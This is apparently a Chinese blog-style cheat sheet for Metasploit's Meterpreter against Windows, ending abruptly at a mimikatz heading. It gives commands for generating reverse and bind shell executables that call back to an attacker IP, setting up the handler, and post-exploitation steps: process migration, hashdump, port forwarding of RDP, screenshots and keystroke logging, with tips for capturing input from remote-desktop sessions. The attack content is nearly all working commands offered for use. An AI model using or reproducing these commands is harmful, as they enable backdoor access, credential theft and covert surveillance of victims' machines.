生成监听用的shell.exe:
reverse_tcp(反向连接)
path : payload/windows/meterpreter/reverse_tcp
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=8080 X > ~/Desktop/shell.exe
reverse_http/https(反向连接)
path:payload/windows/meterpreter/reverse_http/https
msfpayload windows/meterpreter/reverse_https LHOST=192.168.1.2 LPORT=8080 X > ~/Desktop/shell.exe
通过http/https的方式反向连接,在网速慢的情况下不稳定,在某博客上看到https如果反弹没有收到数据,可以将监听端口换成443试试。
bind_tcp(正向连接)
path : payload/windows/meterpreter/bind_tcp
正向连接shell,因为在内网跨网段时无法连接到attack的机器,所以在内网中经常会使用,不需要设置LHOST。
利用shell.exe监听:
msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.2 msf exploit(handler) > set LPORT 8080 msf exploit(handler) > exploit -j msf exploit(handler) >sessions
基本命令:
常用命令:
background:将当前会话放置后台
load/use:加载模块
Interact:切换进一个信道
migrate:迁移进程
run:执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有autoroute,hashdump,arp_scanner,multi_meter_inject等。
Resource:执行一个已有的rc脚本。
写入文件夹:
meterpreter > pwd meterpreter > cd C:\meterpreter > pwd meterpreter > mkdir Hacked by AutoRoot meterpreter > ls
写入内容:
edit + 文件,调用vi编辑。
网络相关:
网络命令则有列出ip信息(ipconfig),展示修改路由表(route),还有端口转发(portfwd)
meterpreter > portfwd meterpreter > portfwd add -l 1314 -p 3389 -r 192.168.1.2
在建立规则之后就可以连接本地1314端口,这样远程的3389端口就转发出来了
键盘监听:
meterpreter > screenshot meterpreter > keyscan_start meterpreter > keyscan_dump
注意一下windows会话窗口的概念,windows桌面划分为不同的会话(session),以便于与windows交互。会话0代表控制台,1,2 代表远程桌面。所以要截获键盘输入必须在0中进行。可 以使用getdesktop查看或者截张图试试。否则使用setdesktop切换。
如果不行就切换到explorer.exe进程中,这样也可以监听到远程桌面连接进来之后的键盘输入数据。
mimikatz:
抓取明文
时间: 2024-10-10 17:43:34